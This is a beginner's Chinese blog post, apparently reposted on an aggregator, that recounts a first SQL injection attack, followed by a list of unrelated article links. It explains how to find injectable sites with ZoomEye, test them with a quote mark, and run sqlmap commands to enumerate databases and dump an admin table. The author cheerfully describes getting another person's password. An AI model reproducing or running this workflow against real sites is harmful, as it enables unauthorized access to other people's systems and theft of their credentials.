菜鸟的sql注入历程
来源:互联网 发布:淘宝店铺信誉 编辑:程序博客网 时间:2024/06/05 04:59
萌萌哒小菜鸟在学习sql注入。
可是看了好多篇关于sql注入的文章之后还是对sql注入一窍不通,只知道一会儿又是爆表一会儿又是爆数据库的,完全云里雾里的。
现在,经过一次实战后终于对sql注入有了一点深刻的了解。当前只接触到mysql,所以以下都以mysql数据库为例,而且也仅代表之前对此的认识,有些错误可能还没学到或意识到。当前实力比较菜,只会用sqlmap玩玩。
一.sql注入的目的
sql注入要么是获取别人的数据,要么是通过sql数据库提权到控制主机。
二.注入步骤
1.找到可注入的网站
我一般是用ZoomEye去搜索网站,然后在站中找到以id=**结尾的地址,然后测试。
例如: http://192.168.1.1/news?id=1
测试:若在地址栏中加一个分号 (即 http://192.168.1.1/news?id=1' ) 访问出错,不出现正常页面,则可能有漏洞。那么我们就可以用sqlmap来测试了。
2.爆数据库类型及版本,爆数据库
sqlmap.py -u " http://192.168.1.1/news?id=1" --dbs
3.猜出密码在哪个数据库中(猜不出就一个一个试)
sqlmap.py -u " http://192.168.1.1/news?id=1" -D databasename --tables
-D参数加数据库名字 --tables显示表格
不加 -D 参数则显示全部表格
我们看到表格中有一个webadmin的表格,那么很有可能密码就在这个表格中。
4.显示表格中的内容
sqlmap.py -u "192.167.1.1/news?id=1" -D databasename -T webadmin --dump我们利用这条命令把webadmin这个表格下载下来分析。-T参数加表格名称 --dump 下载
下载之后的数据在~/.sqlmap/output/目录下。打开后可以发现,
管理员的账户和密码都出现了。不过这密码是经过MD5加密的,我没有破掉。
这是我第一次搞到别人的密码 ,想想还是很激动的。
此次注入完全靠sqlmap,我还是处在一个脚本小子的阶段。不过有这次注入的经历,我对sql注入还是有更深一步的了解。
至于,sqlmap的其他使用,请借鉴sqlmap用户手册。(sqlmap很强大)
以上有问题的地方欢迎大家提出来,欢迎大家指出其中错误之处。
- 菜鸟的sql注入历程
- 菜鸟SQL注入详解
- 菜鸟SQL注入详解
- 菜鸟SQL注入详解
- 菜鸟SQL注入详解
- 菜鸟的JAVA修炼历程:
- 一个菜鸟的心理历程
- java菜鸟的学习历程
- 半路出家的菜鸟程序员的历程
- 菜鸟入门级:SQL注入攻击
- 菜鸟入门级:SQL注入攻击
- 菜鸟入门级:SQL注入攻击
- JDBC防止SQL注入(菜鸟笔记)
- sql注入登陆(菜鸟级)
- 一个DELPHI菜鸟的起步历程
- 菜鸟装IIS的辛苦历程
- MVC--菜鸟的成长历程20150720
- 菜鸟的Linux历程-vi编辑器使用
- MyBatis 学习总结(一)——MyBatis 简单介绍及快速入门
- 实时log记录管理
- iOS的Socket开发基础
- 结合MongoDB开发LBS应用
- SpringMVC源码剖析(四)- DispatcherServlet请求转发的实现
- 菜鸟的sql注入历程
- Android中的ListView和Adapter
- Python super()深度思考
- ShareSDK微信支付成功不调用onResp、openURL、handleOpenURL等方法
- MemCache详细解析
- iOS键盘弹出又消失的问题
- Java AtomicInteger
- jenkis 自动化部署的几种方式(git+maven)(svn+maven)(svn+tomcat)
- Starting VNC server: 1:root vncserver: geometry 800X600 is invalid